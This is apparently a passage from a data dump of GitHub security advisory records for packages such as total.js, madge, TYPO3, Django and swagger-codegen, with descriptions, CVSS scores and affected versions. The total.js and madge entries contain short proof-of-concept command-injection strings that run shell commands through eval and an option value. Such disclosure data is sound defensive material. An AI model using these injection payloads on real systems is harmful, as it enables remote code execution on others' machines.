+* [TYPO3-CORE-SA-2021-004](https://typo3.org/security/advisory/typo3-core-sa-2021-004)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.2.0'}, {'fixed': '10.4.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.4.13'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-x79j-wgqv-g8h2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21358'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/typo3/cms-form'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-004'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T01:42:00Z', 'nvd_published_at': '2021-03-23T02:15:00Z'}"
+1.4.0,GHSA-3wj8-vp9h-rm6m,2023-09-13T20:23:10Z,2021-03-19T21:32:20Z,,['CVE-2021-23344'],total.js Remote Code Execution Vulnerability,"total.js is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as web, desktop, service or IoT application.
+
+Affected versions of this package are vulnerable to Remote Code Execution (RCE) via `set`.
+
+### PoC
+```js
+// To be run in a nodejs console:
+require('total.js/utils').set({}, 'a;eval(`require(""child_process"")\\x2eexecSync(""touch pwned"")`);//')
+```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'total.js'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.8'}]}], 'database_specific': {'last_known_affected_version_range': '< 3.4.7'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23344'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework/commit/c812bbcab8981797d3a1b9993fc42dad3d246f04'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TOTALJS-1077069'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T22:42:43Z', 'nvd_published_at': '2021-03-04T17:15:00Z'}"
+1.4.0,GHSA-wq4r-8342-jmc9,2021-03-23T20:31:43Z,2021-03-29T20:24:44Z,,['CVE-2021-28381'],SQL injection in vhs (aka VHS: Fluid ViewHelpers),The vhs (aka VHS: Fluid ViewHelpers) extension before 5.1.1 for TYPO3 allows SQL injection via isLanguageViewHelper.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'fluidtypo3/vhs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28381'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-001'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T20:31:43Z', 'nvd_published_at': '2021-03-16T20:15:00Z'}"
+1.4.0,GHSA-4p9g-qgx9-397p,2021-03-29T17:43:44Z,2021-03-23T01:54:09Z,,['CVE-2021-21359'],Denial of Service in Page Error Handling,"> ### Meta
+> * CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C` (5.5)
+> * CWE-405, CWE-674
+> * Status: **DRAFT**
+
+### Problem
+Requesting invalid or non-existing resources via HTTP triggers the page error handler which again could retrieve content to be shown as error message from another page. This leads to a scenario in which the application is calling itself recursively - amplifying the impact of the initial attack until the limits of the web server are exceeded.
+
+### Solution
+Update to TYPO3 versions 9.5.25, 10.4.14, 11.1.1 that fix the problem described.
+
+### Credits
+Thanks to Paul Keller, Mathias Bolt Lesniak and Kay Strobach who reported this issue and to TYPO3 framework merger Frank Nägler and to TYPO3 security team member Torben Hansen who fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2021-005](https://typo3.org/security/advisory/typo3-core-sa-2021-005)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.5.24'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.4.13'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-4p9g-qgx9-397p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21359'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/typo3/cms-core'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-005'}]","{'cwe_ids': ['CWE-405', 'CWE-674'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T01:42:10Z', 'nvd_published_at': '2021-03-23T02:15:00Z'}"
+1.4.0,GHSA-w36g-q975-37rg,2021-03-12T22:48:12Z,2021-03-18T19:30:20Z,,['CVE-2021-26814'],Improper Input Validation (RCE),Wazuh API in Wazuh from 4.0.0 to 4.0.3 allows authenticated users to execute arbitrary code with administrative privileges via /manager/files URI. An authenticated user to the service may exploit incomplete input validation on the /manager/files API to inject arbitrary code within the API service script.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'wazuh'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.0.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26814'}, {'type': 'WEB', 'url': 'https://documentation.wazuh.com/4.0/release-notes/release_4_0_4.html'}, {'type': 'WEB', 'url': 'https://github.com/wazuh/wazuh/releases/tag/v4.0.4'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T22:48:12Z', 'nvd_published_at': '2021-03-06T02:15:00Z'}"
+1.4.0,GHSA-pjj4-jjgc-h3r8,2021-03-12T22:28:01Z,2021-03-12T23:09:24Z,,[],Authenticated remote code execution,"### Impact
+Authenticated remote code execution using plugin manager without ACL permissions.
+
+### Patches
+We recommend to update to the current version 6.3.5.2. You can get the update to 6.3.5.2 regularly via the Auto-Updater or directly via the download overview.
+
+https://www.shopware.com/en/download/#shopware-6
+
+### Workarounds
+For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
+
+https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
+
+### For more information
+https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-03-2021",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-pjj4-jjgc-h3r8'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-03-2021'}]","{'cwe_ids': ['CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T22:28:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vmf5-924f-25f2,2021-03-18T22:36:03Z,2021-03-29T20:59:12Z,,['CVE-2019-1103'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1062, CVE-2019-1092, CVE-2019-1106, CVE-2019-1107.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1103'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/75162b7f2d8ac2b37d17564e9c979ba1bae707e8'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/efab3101028045cbfa0cc21bd852f75bcc037dba'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1103'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:36:03Z', 'nvd_published_at': '2019-07-15T19:15:00Z'}"
+1.4.0,GHSA-pch5-whg9-qr2r,2023-09-08T20:25:35Z,2021-03-29T21:32:05Z,,['CVE-2021-29418'],netmask npm package mishandles octal input data,"The netmask package before 2.0.1 for Node.js mishandles certain unexpected characters in an IP address string, such as an octal digit of 9. This (in some situations) allows attackers to bypass access control that is based on IP addresses. NOTE: this issue exists because of an incomplete fix for CVE-2021-28918.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'netmask'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29418'}, {'type': 'WEB', 'url': 'https://github.com/rs/node-netmask/commit/3f19a056c4eb808ea4a29f234274c67bc5a848f4'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210604-0001/'}, {'type': 'WEB', 'url': 'https://sick.codes/sick-2021-011'}, {'type': 'WEB', 'url': 'https://sick.codes/universal-netmask-npm-package-used-by-270000-projects-vulnerable-to-octal-input-data-server-side-request-forgery-remote-file-inclusion-local-file-inclusion-and-more-cve-2021-28918/'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/6'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/netmask'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T21:31:24Z', 'nvd_published_at': '2021-03-30T07:15:00Z'}"
+1.4.0,GHSA-7vwg-39h8-8qp8,2021-03-11T17:41:09Z,2021-03-11T17:42:01Z,,[],/user/sessions endpoint allows detecting valid accounts,"This Security Advisory is about a vulnerability in eZ Platform v1.13, v2.5, and v3.2, and in Ibexa DXP and Ibexa Open Source v3.3. The /user/sessions endpoint can let an attacker detect if a given username or email refers to a valid account. This can be detected through differences in the response data or response time of certain requests. The fix ensures neither attack is possible. The fix is distributed via Composer.
+
+If you come across a security issue in our products, here is how you can report it to us: https://doc.ibexa.co/en/latest/guide/reporting_issues/#toc",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform-rest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.2.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.2.2.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform-rest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.3.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezplatform-rest/security/advisories/GHSA-7vwg-39h8-8qp8'}, {'type': 'WEB', 'url': 'https://github.com/ezsystems/ezplatform-rest/commit/e239bba8b154a3b4cf787e29b9f15edf8945d933'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/ezsystems/ezplatform-rest'}]","{'cwe_ids': ['CWE-203'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-11T17:41:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-753c-phhg-cj29,2023-09-06T23:33:10Z,2021-03-12T23:01:49Z,,['CVE-2021-23352'],Madge vulnerable to command injection,"This affects the package madge before 4.0.1. It is possible to specify a custom Graphviz path via the graphVizPath option parameter which, when the .image(), .svg() or .dot() functions are called, is executed by the childprocess.exec function.
+
+### PoC
+```js
+const madge = require('madge');
+madge('..', {graphVizPath: ""touch HELLO;""}) .then((res) => res.svg()) .then((writtenImagePath) => { console.log('Image written to ' + writtenImagePath); });
+```",[],"[{'package': {'ecosystem': 'npm', 'name': 'madge'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23352'}, {'type': 'WEB', 'url': 'https://github.com/pahen/madge/commit/da5cbc9ab30372d687fa7c324b22af7ffa5c6332'}, {'type': 'WEB', 'url': 'https://github.com/pahen/madge/blob/master/lib/graph.js#L27'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MADGE-1082875'}]","{'cwe_ids': ['CWE-77', 'CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T21:10:53Z', 'nvd_published_at': '2021-03-09T19:15:00Z'}"
+1.4.0,GHSA-h23m-w6x5-jwr4,2021-03-18T21:55:02Z,2021-03-29T21:00:08Z,,['CVE-2019-0923'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0923'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/972584709518380a4a3c2410b5fa151f6f0239b1'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0923'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:55:02Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
+1.4.0,GHSA-pc22-3g76-gm6j,2021-03-22T23:45:20Z,2021-03-11T03:09:16Z,,['CVE-2021-21363'],Generator Web Application: Local Privilege Escalation Vulnerability via System Temp Directory,"### Impact
+
+On Unix like systems, the system's temporary directory is shared between all users on that system. A collocated user can observe the process of creating a temporary sub directory in the shared temporary directory and race to complete the creation of the temporary subdirectory.
+
+This vulnerability is local privilege escalation because the contents of the `outputFolder` can be appended to by an attacker. As such, code written to this directory, when executed can be attacker controlled.
+
+#### Java Code
+
+The method `File.createTempFile` from the JDK is vulnerable to this local information disclosure vulnerability.
+
+https://github.com/swagger-api/swagger-codegen/blob/068b1ebcb7b04a48ad38f1cadd24bb3810c9f1ab/modules/swagger-generator/src/main/java/io/swagger/generator/online/Generator.java#L174-L185
+
+
+### Patches
+
+Fix has been applied to the master branch with:
+
+* https://github.com/swagger-api/swagger-codegen/commit/987ea7a30b463cc239580d6ad166c707ae942a89
+
+included in release: 2.4.19
+
+
+### References
+
+* [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)
+* [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html)
+
+### For more information
+If you have any questions or comments about this advisory:
+
+* Email us at [security@swagger.io](mailto:security@swagger.io)
+
+#### Original vulnerability report
+
+> I'm performing OSS security research under the GitHub Security Lab Bug Bounty program.
+> I've been using a custom CodeQL query to find local temporary directory vulnerabilities in OSS with three custom CodeQL queries.
+>
+> - https://github.com/github/codeql/pull/4388/files#diff-71d36c0f2bd0b08e32866f873f1c906cdc17277e0ad327c0c6cd2c882f30de4f
+> - https://github.com/github/codeql/pull/4388/files#diff-1893a18a8bf43c011d61a7889d0139b998a5a78701a30fe7722eddd4c506aaac
+> - https://github.com/github/codeql/pull/4473
+>
+> The code generated by the Swagger Generator contains a local information disclosure vulnerability. The system temporary directory, on unix-like systems is shared between multiple users. Information written to this directory, or directories created under this directory that do not correctly set the posix standard permissions can have these directories read/modified by other users.
+>
+> ---
+>
+> This vulnerability exists in the maven plugin.
+>
+> This vulnerability is distinctly different. This vulnerability is most likely a local privilege escalation vulnerability.
+>
+> https://github.com/swagger-api/swagger-codegen/blob/068b1ebcb7b04a48ad38f1cadd24bb3810c9f1ab/modules/swagger-generator/src/main/java/io/swagger/generator/online/Generator.java#L174-L185
+>
+> This vulnerability is very similar to this similar vulnerability I disclosed in the Eclipse Jetty project.
+>
+> https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6
+>
+> This is due to a race condition between the call to `delete` and the call to `mkdirs`.
+>
+> ```java
+> // ensure file will always be unique by appending random digits
+> File outputFolder = File.createTempFile(""codegen-"", ""-tmp""); // Attacker knows the full path of the file that will be generated
+> // delete the file that was created
+> outputFolder.delete(); // Attacker sees file is deleted and begins a race to create their own directory before Swagger Code Generator.
+> // and make a directory of the same name
+> // SECURITY VULNERABILITY: Race Condition! - Attacker beats Swagger Code Generator and now owns this directory
+> outputFolder.mkdirs();
+> ```
+>
+> This vulnerability is local privilege escalation because the contents of the `outputFolder` can be appended to by an attacker. As such, code written to this directory, when executed can be attacker controlled.
+>
+> The fix here is to switch to the `Files` API for creating temporary directories. Which does not contain this race condition, and appropriately sets the correct file permissions.
+> ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.swagger:swagger-codegen'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.19'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-codegen/security/advisories/GHSA-pc22-3g76-gm6j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21363'}, {'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-codegen/commit/987ea7a30b463cc239580d6ad166c707ae942a89'}]","{'cwe_ids': ['CWE-378', 'CWE-379'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-11T03:07:41Z', 'nvd_published_at': '2021-03-11T03:15:00Z'}"
+1.4.0,GHSA-2cxf-6567-7pp6,2021-07-08T17:02:28Z,2021-03-03T23:01:17Z,,['CVE-2021-21331'],Local Information Disclosure Vulnerability,"### Impact
+Local information disclosure of sensitive information downloaded via the API using the API Client.
+
+### Finding
+The Datadog API is executed on a unix-like system with multiple users. The API is used to download a file containing sensitive information. This sensitive information is exposed locally to other users. This vulnerability exists in the API Client for version 1 and 2. The method `prepareDownloadFilecreates` creates a temporary file with the permissions bits of `-rw-r--r--` on unix-like systems. On unix-like systems, the system temporary directory is shared between users. As such, the contents of the file downloaded via the `downloadFileFromResponse` method will be visible to all other users on the local system.
+
+Analysis of the finding determined that the affected code was unused, meaning that the exploitation likelihood is low. The unused code has been removed, effectively mitigating this issue.
+
+This vulnerability was found due to [this query](https://lgtm.com/query/8938575359870595124/) that [Jonathan Leitschuh](https://github.com/JLLeitschuh) contributed to the Semmle QL project.
+
+### Patches
+This issue has been patched in [version 1.0.0-beta.9](https://github.com/DataDog/datadog-api-client-java/releases/tag/datadog-api-client-1.0.0-beta.9).
+
+See also [Remove unused downloadFile helpers](https://github.com/DataDog/datadog-api-client-java/pull/637).
+
+### Workarounds
+The recommended workaround is to specify `java.io.tmpdir` when starting the JVM with the flag `-Djava.io.tmpdir`, specifying a path to a directory with `drw-------` permissions owned by `dd-agent`.
+
+### References
+* [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)
+* [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [DataDog/datadog-api-client-java](https://github.com/DataDog/datadog-api-client-java)
+* Email us at [security@datadoghq.com](mailto:security@datadoghq.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.datadoghq:datadog-api-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0-beta.6'}, {'fixed': '1.0.0-beta.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/DataDog/datadog-api-client-java/security/advisories/GHSA-2cxf-6567-7pp6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21331'}, {'type': 'WEB', 'url': 'https://github.com/DataDog/datadog-api-client-java/releases/tag/datadog-api-client-1.0.0-beta.9'}]","{'cwe_ids': ['CWE-378', 'CWE-379'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-03T22:58:04Z', 'nvd_published_at': '2021-03-03T23:15:00Z'}"
+1.4.0,GHSA-537h-rv9q-vvph,2023-09-01T10:08:35Z,2021-03-24T18:24:39Z,,['CVE-2020-13757'],Python-RSA decryption of ciphertext leads to DoS,"Python-RSA before 4.1 ignores leading '\0' bytes during decryption of ciphertext. This could conceivably have a security-relevant impact, e.g., by helping an attacker to infer that an application uses Python-RSA, or if the length of accepted ciphertext affects application behavior (such as by causing excessive memory allocation).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'rsa'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13757'}, {'type': 'WEB', 'url': 'https://github.com/sybrenstuvel/python-rsa/issues/146'}, {'type': 'WEB', 'url': 'https://github.com/sybrenstuvel/python-rsa/issues/146#issuecomment-641845667'}, {'type': 'PACKAGE', 'url': 'https://github.com/sybrenstuvel/python-rsa'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2KILTHBHNSDUCYV22ODLOKTICJJ7JQIQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZYB65VNILRBTXL6EITQTH2PZPK7I23MW/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4478-1/'}]","{'cwe_ids': ['CWE-327'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T18:24:28Z', 'nvd_published_at': '2020-06-01T19:15:00Z'}"
+1.4.0,GHSA-m6gj-h9gm-gw44,2023-09-05T14:32:18Z,2021-03-18T20:30:13Z,,['CVE-2020-24583'],Django Incorrect Default Permissions,"An issue was discovered in Django 2.2 before 2.2.16, 3.0 before 3.0.10, and 3.1 before 3.1.1 (when Python 3.7+ is used). FILE_UPLOAD_DIRECTORY_PERMISSIONS mode was not applied to intermediate-level directories created in the process of uploading files. It was also not applied to intermediate-level collected static directories when using the collectstatic management command.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2'}, {'fixed': '2.2.16'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0'}, {'fixed': '3.0.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1'}, {'fixed': '3.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24583'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/8d7271578d7b153435b40fe40236ebec43cbf1b9'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/dev/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/django-announce/Gdqn58RqIDM'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/django-announce/zFCMdgUnutU'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/F2ZHO3GZCJMP3DDTXCNVFV6ED3W64NAU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OLGFFLMF3X6USMJD7V5F5P4K2WVUTO3T/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZCRPQCBTV3RZHKVZ6K6QOAANPRZQD3GI/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200918-0004/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4479-1/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2020/sep/01/security-releases/'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2020/09/01/2'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}]","{'cwe_ids': ['CWE-276'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-13T00:36:46Z', 'nvd_published_at': '2020-09-01T13:15:00Z'}"
+1.4.0,GHSA-9295-mhf3-v33m,2023-08-08T19:54:40Z,2021-03-29T18:25:26Z,,['CVE-2021-28099'],Insecure temporary file in Netflix OSS Hollow,"> ID: NFLX-2021-001
+> Title: Local information disclosure in Hollow
+> Release Date: 2021-03-23
+> Credit: Security Researcher @JLLeitschuh
+
+# Overview
+
+Security researcher @JLLeitschuh reported that Netflix Hollow (a Netflix OSS project available here: https://github.com/Netflix/hollow) writes to a local temporary directory before validating the permissions on it.
+
+# Impact
+
+An attacker with the ability to create directories and set permissions on the local filesystem could pre-create this directory and read or modify anything written there by the Hollow process.
+
+# Description
+
+Since the `Files.exists(parent)` is run before creating the directories, an attacker can pre-create these directories with wide permissions. Additionally, since an insecure source of randomness is used, the file names to be created can be deterministically calculated.
+
+# Workarounds and Fixes
+
